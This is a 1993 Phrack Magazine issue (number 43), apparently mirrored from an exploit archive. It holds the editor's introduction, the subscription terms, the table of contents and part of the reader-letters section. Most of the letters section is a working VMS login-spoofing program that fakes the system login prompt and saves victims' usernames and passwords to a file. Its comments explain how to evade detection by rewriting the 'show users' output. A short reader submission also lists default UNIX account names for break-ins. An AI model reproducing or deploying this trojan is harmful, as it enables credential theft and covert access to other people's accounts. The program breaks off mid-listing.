Phrack #43

EDB-ID:

42854

CVE:

N/A


Author:

phrack

Type:

papers


Platform:

Magazine

Date:

1993-07-01


                              ==Phrack Magazine==

                   Volume Four, Issue Forty-Three, File 1 of 27

                                 Issue 43 Index
                              ___________________

                               P H R A C K   4 3

                                  July 1, 1993
                              ___________________

       ~ finger whitehouse.gov and make a secret service agent come ~


Well, here it is:  Phrack 43.  This issue should really piss every security
professional off.  Well, actually, none of them should ever see it because
only two people have registered their subscriptions.

But, then again I think we all know that the whole world is FULL of
lying, thieving people who just don't care about other people's
property.  No, smarty, not hackers...computer professionals!

CASE 1:

The Computer Emergency Response Team.  Bastions of life, liberty and the
pursuit of happiness.  CERT had been on the Phrack mailing list
previously, and was sent a copy of 42 (as was everyone) to give them
the opportunity to subscribe.  Rather than do the right thing
and let us at Phrack know that they were not interested in paying,
and to take their name off the list, Ed DiHart instead forwarded off
several copies to his cronies.

Luckily for us, Ed is not the best typist, and the mail bounced all the way
back to Phrack.  I called Ed and asked him why he would do such a thing,
which was clearly a direct violation of US Copyright Law.  Ed claimed
he didn't know of any new rules for Phrack, and that he had always forwarded
off a few copies to his pals.  I told Ed that this practice was unacceptable
and that if he wanted to continue to get Phrack he and his pals would all have
to register their subscriptions.  Ed said that he did not want to pay
and to take CERT off the list.

A month prior to this Ed had said to me at the Computers, Freedom & Privacy
conference in San Francisco, "Why are YOU here anyway?  It sure is IRONIC
that someone whose goal in life was to invade other people's privacy would
be attending a conference on protecting privacy."  I walked away from him in
disgust.

While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC
that an organization such as CERT, whose main goal is to help protect
the property of others would so flagrantly violate US Copyright law and
completely disregard someone's property rights."  Man, did that feel great!


CASE 2:

BT Tymnet.  Dale Drew, security guru, made the statement on IRC about
Phrack, "I have absolutely no desire to pay for anything having to do with
hackers."  Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com)
logged into Len Rose's machine and ftp'd Phrack 42.  With prior knowledge
Phrack was not free, he willingly used company property to commit a crime.
At most companies, that is grounds for termination.  Luckily for Dale
Tymnet doesn't give a shit.  In fact, Dale several times since has gone
back on IRC stating, "People here are Tymnet are kind of upset about
Phrack 42."  This just shows that people at Tymnet are just as criminal
as they say hackers are.  Since they could care less about MY property,
then why should I care about theirs?  Maybe I should print a list of
all Tymnet internal NUIs!  Well, two wrongs won't make a right, so I better
not.

I did, however, send email to Dale stating that we were aware of Tymnet's
transgressions and that we may be forced to take legal action.  I have
decided to offer BT a sweet deal on a company-wide site license.  We
shall see if they take me up on this offer, or continue to steal Phrack.

CASE 3:

Gail Thackeray.  A woman sworn by the court to uphold the laws of the
land.  This woman had the audacity to tell me that unless I
enforced my copyright, it was worthless.  Unless I enforce it.  What the
hell does that mean?  Am I supposed to raid companies myself and
go dig for evidence that they have stolen my information?  Geez...it's
not like I'm Bellcore.  Gail's disgusting interpretation of the law,
that unless you are big enough to stand up for yourself then you have
no recourse, is a festering sore on the face of the American Legal system
and I personally am appalled that this woman is allowed to act as
a law enforcement professional.

Oh well, as you can tell I've had a little fun with all this.  And I have
effectively proven my point.  Security people, corporate professionals,
and law enforcement types are just as unscrupulous and unethical as they
have always claimed that we are.

Only TWO PEOPLE within the computer/legal/security profession have the right
to receive and keep copies of Phrack.  Winn Schwartau, and a man at Mitre.
It's amazing that they are the only ones with any scruples, isn't it?

Well, let's get on with the issue.  This one is pure, unadulterated evil.
Only the strong will survive this time.  We've got Cellular, we've got
Novell, we've got 5e, we've got PHRACK TRIVIA!  Get comfortable, grab
your favorite intoxicant, and enjoy.

*NOTES*  Some of you will recognize the 5ESS file from the Summer issue of
2600 magazine.  This file was sent to both myself and E. Goldstein.  I
was told by the author that 2600 was not printing it.  Wrong.  Well, we
got permission from 2600 to print it here too since its such a good file,
and since I spent like 8 hours dealing with the author correcting
and editing it.  In the future gang, if you send something to Phrack AND
to 2600, TELL US BEFOREHAND!  The last thing I want to hear is, "Phrack
is plagiarizing 2600...gawd they are so lame."  The acronym file, you will
note, is DIFFERENT.  Heh.

In addition to the above, you may notice that we were a bit late in
distributing this issue.  As many of you saw through the "resubscribe"
blurb sent over the mailing list, Phrack is not going through Stormking.COM
any longer.  The struggle to relocate put us into further delays
but I've managed to take care of securing a new distribution site.
We want to thank everyone at Stormking for shipping Phrack out for
so long, and wish them the best in their future endeavors.

-------------------------------------------------------------------------
                        READ THE FOLLOWING

                IMPORTANT REGISTRATION INFORMATION

Corporate/Institutional/Government:  If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.

You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file.

Individual User:  If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge.  You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists.  If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.

_______________________________________________________________

Phrack Magazine corporate/institutional/government agreement

   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
AGREEMENT.  Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement.  Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.

   This magazine may not be distributed by Company to any
outside corporation, organization or government agency.  This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee.  If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge.  This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.

    This Magazine is protected by United States copyright laws and
international treaty provisions.  Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement.  Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.

    In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.

    In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.

    This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas.  The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.

    This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement.  The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.

_________________________________________________________________

            REGISTRATION INFORMATION REQUEST FORM


We have approximately __________ users.

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Hard Copy:       _________
Diskette:        _________  (Include size & computer format)


Name:_______________________________  Dept:____________________

Company:_______________________________________________________

Address:_______________________________________________________

_______________________________________________________________

City/State/Province:___________________________________________

Country/Postal Code:___________________________________________

Telephone:____________________   Fax:__________________________


Send to:

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------


Enjoy the magazine.  It is for and by the hacking community.  Period.


      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
                3L33t : OMAR
                 News : Datastream Cowboy
          Photography : dFx
          Pornography : Stagliano
    Prison Consultant : Co / Dec
          The Baddest : Dolomite
             Rad Book : Snow Crash
     Reasons Why I Am
         The Way I Am : Hoffman, Hammett, The Power Computer
               Typist : Minor Threat
    Future Movie Star : Weevil
   SCon Acid Casualty : Weevil
            Thanks To : Robert Clark, Co/Dec, Spy Ace, Lex Luthor
                        Phreak Accident, Madjus, Frosty, Synapse, Hawkwind
                        Firm G.R.A.S.P., Aleph One, Len Rose, Seven-Up
                        Computer Crime Laboratories

"If you can take the bag off of your own head, then you haven't had
enough nitrous."  -- KevinTX

Phrack Magazine V. 4, #43, July 1, 1993.     ISSN 1068-1035
Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission of the Editor-In-Chief.  Phrack Magazine is made available
quarterly to the amateur computer hobbyist free of charge.  Any
corporate, government, legal, or otherwise commercial usage or
possession (electronic or otherwise) is strictly prohibited without
prior registration, and is in violation of applicable US Copyright laws.
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
the list.

                    Phrack Magazine
                    603 W. 13th #1A-278       (Phrack Mailing Address)
                    Austin, TX 78701

                    ftp.netsys.com            (Phrack FTP Site)
                    /pub/phrack

                    phrack@well.sf.ca.us      (Phrack E-mail Address)

Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything.  Heavens no.  That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication.  Yeah, that's it.   :) )

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----


  -= Phrack 43 =-
 Table Of Contents
 ~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                               24K
 2. Phrack Loopback Part I                                   38K
 3. Phrack Loopback Part II / Editorial                      44K
 4. Line Noise Part I                                        39K
 5. Line Noise Part II                                       43K
 6. Phrack Pro-Phile on Doctor Who                           15K
 7. Conference News Part I by Various Sources                53K
 8. Conference News Part II by Various Sources               58K
 9. How To Hack Blackjack (Part I) by Lex Luthor             52K
10. How To Hack Blackjack (Part II) by Lex Luthor            50K
11. Help for Verifying Novell Security by Phrack Staff       48K
12. My Bust (Part I) by Robert Clark                         56K
13. My Bust (Part II) by Robert Clark                        55K
14. Playing Hide and Seek, Unix Style by Phrack Accident     31K
15. Physical Access and Theft of PBX Systems by Co/Dec       28K
16. Guide to the 5ESS by Firm G.R.A.S.P.                     63K
17. Cellular Info by Madjus (N.O.D.)                         47K
18. LODCOM BBS Archive Information                           24K
19. LODCOM Sample Messages                                   52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace       21K
21. Acronyms Part I by Firm G.R.A.S.P.                       50K
22. Acronyms Part II by Firm G.R.A.S.P.                      51K
23. Acronyms Part III by Firm G.R.A.S.P.                     45K
24. Acronyms Part IV by Firm G.R.A.S.P.                      52K
25. Acronyms Part V by Firm G.R.A.S.P.                       46K
26. International Scene by Various Sources                   51K
27. Phrack World News by Datastream Cowboy                   24K

                                                    Total: 1152K

     Another reason why the future is wireless.

     "The CTIA recommended that the FCC require the microprocessor chip be
     difficult to detach from the circuit board in order to prevent its
     removal and replacement or reprogramming."
     (Cellular Marketing, p. 18, May 1993)

     "Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!"
     (Anonymous hacker-type, Tumbled Cellphone Call, 1993)

_______________________________________________________________________________


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 2 of 27

                                Phrack Loopback
                                    Part I

****************************************************************************

                               COMING NEXT ISSUE

                         Van Eck Info (Theory & Practice)
   More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
      HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)
                          Neato Plans For Evil Devices
                               Gail Thackeray Gifs

*********************************** M A I L *********************************

Chris,

Craig Neidorf gave me these addresses as ways to reach you.  He tells me
that you are currently editing Phrack.  I hope you are well.

Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month.  They did some
investigation at my request.  We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so.  This is several gigabytes per month.  All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic.  All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.

EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month.  The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs.  Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget.  I'm sure you can understand this.

On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it.  I wanted to raise this issue now to let
you know in advance of this happening.

I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.

Mitch



------------------------------------------------------------------------------
                Mitchell Kapor, Electronic Frontier Foundation
     Note permanent new email address for all correspondence as of 6/1/93
                              mkapor@kei.com


[Editor:  Well, all things must come to an end.  Looks like EFF's
          move to Washington is leaving behind lots of bad
          memories, and looking forward to a happy life in the hotbed
          of American politics.  We wish them good luck.  We also
          encourage everyone to join.........CPSR.

          In all fairness, I did ask Mitch more detail about the
          specifics of the cost, and he explained that EFF was paying
          flat rate for a fractional T-1, and whenever they went over
          their allotted bandwidth, they were billed above and beyond
          the flat rate.  Oh well.  Thank GOD for Len Rose.
          Phrack now has a new home at ftp.netsys.com.]

****************************************************************************

  I'm having a really hard time finding a lead to the Information
America Network.  I am writing you guys as a last resort.  Could
you point me in the right direction?  Maybe an access number or
something?  Thanks you very much.

[Editor:  You can reach Information America voice at 404-892-1800.
          They will be more than happy to send you loads of info.]

****************************************************************************

 To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:

 Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!
Gain and influence friends!  Irritate SysOps!  Attain the worship and
admiration of your online pals.  Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like.  They are as follows (tested on Searchlight BBS
System v2.25D):

        \%A  =  displays user's access level
        \%B  =  displays baud rate connected at
        \%C  =  unknown
        \%F  =  unknown
        \%G  =  displays graphics status
        \%K  =  displays user's first name
        \%L  =  displays system time
        \%M  =  displays user's time left on system
        \%N  =  displays user's name in format: First Last
        \%O  =  times left to call "today"
        \%P  =  unknown
        \%S  =  displays line/node number and BBS name
        \%T  =  displays user's time limit
        \%U  =  displays user's name in format: FIRST_LAST

All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.

 Example:  Hey there chump, I mean \%K, you better you better UL or log
           off of \%S...you leach too damn many files..you got \%M mins
           left to upload some new porn GIFs or face bodily harm and
           mutilation!.

                      ----------------------------

Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS


[Editor:  Ya know, once a LONG LONG time ago, I got on a BBS and
          while reading messages noticed that a large amount of
          messages seemed to be directed at ME!!#  It took me
          about 10 minutes to figure it out, but BOY WAS I MAD!

          Then I added my own \%U message for the next hapless fool.
          :)  BIG FUN!]

****************************************************************************

-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-

                                 SotMESC

                   The US SotMESC Chapter is offering
                 Scholarships for the 1993 school term.

              Entries should be single-spaced paragraphs,
                  Double-spacing between paragraphs.

               The subject should center on an aspect of the
            Computer Culture and be between 20-30 pages long.

                           Send entries to:

                               SotMESC
                              PO Box 573
                         Long Beach, MS 39560

    All entries submitted will become the property of the SotMESC

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

****************************************************************************

           The Southwest Netrunner's League's
-----------------------------------------------------------------
  WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------

 Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
 Assists  by:SysCon XIV       (The Ma'Bell Rapist)
      Iron Man MK 4a   (Things that make ya go boom)

 This file begs to be folded, spindeled,and mutilated.
 No Rights Reserved@1993

-----------------------------------------------------------------

  Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu

  Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------

Part I(Basic commands)

Phile Commands: ls=List Philes
  more,page=Display Phile on Yo Terminal
  cp=Copy Phile
  mv=Move or Remove Philes
  rm=Remove Philes

Editor Commnds: vi=Screen Editor

Dirtory cmmnds: dir=Prints Directory
  mkdir=Makes a new Directory(also a VERY bad bug)
  rmdir=Remove a Directory
  pwd=print working directory

Misc. Commands: apropos=Locate commands by keyword lookup.
  whatis=Display command description.
  man=Displays manual pages online.
  cal=Prints calendar
  date=Prints the time and date.
  who=Prints out every one who is logged in
      (Well, almost everyone 7:^]  )

---------------------------------------------------------------

Part II(Security(UNIX security, another OXYMORON  7:^]  ))

If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....

 root
 unmountsys
 setup
 makefsys
 sysadm
 powerdown
 mountfsys
 checkfsys


All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....

 6-8 characters
 6-8 characters
 1 character is a special character (exmpl:# ! ' & *)

-----------------------------------------------------------------

Well thats all fo' now tune in next time, same Hack-time
       same Hack-channel!!!


 THE TECHNOMANCER           I have taken all knowledge
   af604@FreeNet.hsc.colorado.edu
                                   to be my province

--
Technomancer
Southwest Netrunner's League

*****************************************************************

[Editor:  This is an example of what NOT to send to Phrack.
          This is probably the worst piece of garbage I've
          received, so I had to print it.  I can only hope
          that it's a private joke that I just don't get.

          Uh, please don't try to write something worse and
          submit it hoping to have it singled out as the
          next "worst," since I'll just ignore it.]

****************************************************************************

Dear Phrack,
   I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
   There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:

$show == ""

then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
   The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
                                            Lady Shade

I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice

------------------------------------------------

$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination.           !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool...                                                      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo "   ZJABAD_X     logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in  !!!!
!!!! a file called user.dat                                              !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what  !!!!
!!!! the system login screen does.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated            !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to        !!!!
!!!! uppercase for the input of a username. This is wonderful for         !!!!
!!!! preventing program detection, but it does cause a problem. It slows  !!!!
!!!! the screen down, which looks suspicious. So, in the case where a     !!!!
!!!! user walks up tot he terminal and holds the return key down for a    !!!!
!!!! bit before typing in their username, this section speeds up the run  !!!!
!!!! considerably.                                                        !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough    !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is     !!!!
!!!! implemented, you should at least put in something that looks like    !!!!
!!!! you have just logged in, the program should not kick straight back   !!!!
!!!! to your command level, but rather execute your login.com. 2) You     !!!!
!!!! can log in to the account which is stealing the password from a      !!!!
!!!! different terminal and stop the process on the account which is      !!!!
!!!! running the program. This is much safer, and my recommandation.      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side.      !!!!
!!!! This section first writes the show users data to a file and alters    !!!!
!!!! it before it is written to the screen for viewing by the user. There  !!!!
!!!! may exist many forms of the show users command in your system, and    !!!!
!!!! you may have to handle each one differently. I have written only two  !!!!
!!!! manipulations into this code to be used as an example. But looking    !!!!
!!!! at how this is preformed should be enough to allow you to write your  !!!!
!!!! own special cases. Notice that what happens to activate this section  !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables     !!!!
!!!! passed into the program as p1, p2, etc. in the order which they       !!!!
!!!! were typed after the word show. Also, by incorporating a third data   !!!!
!!!! file into the manipulations, one can extract the terminal id for the  !!!!
!!!! account which the program is running out of and plug this into the    !!!!
!!!! place where the user's line displays his or her terminal id. Doing    !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail.                                                         !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show$'
$manipulate:
$set message/nofacility/noseverity/notext/noidentification
$open/read io1 users.dat
$open/write io2 users2.dat
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
!!!! there is a chance that the files users.dat and users2.dat could be    !!!
!!!! left in their directory. That is a bad thing as we are trying to      !!!
!!!! prevent detection :)                                                  !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$on control_y then goto aborted
$user = ""
$test = ""
$long = ""
$ch = ""
$length = 0
$user = f$user()
$length = f$length(user) - 2
$user = f$extract(1,length,user)
$read_loop:
$read/end_of_file=eof io1 line
$test = f$extract(1,length,line)
$ch = f$extract (length+1,1,line)
$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
$from_change:
$write io2 line
$goto read_loop
$eof:
$close io1
$close io2
$type users2.dat
$del users.dat;*
$del users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
$change:
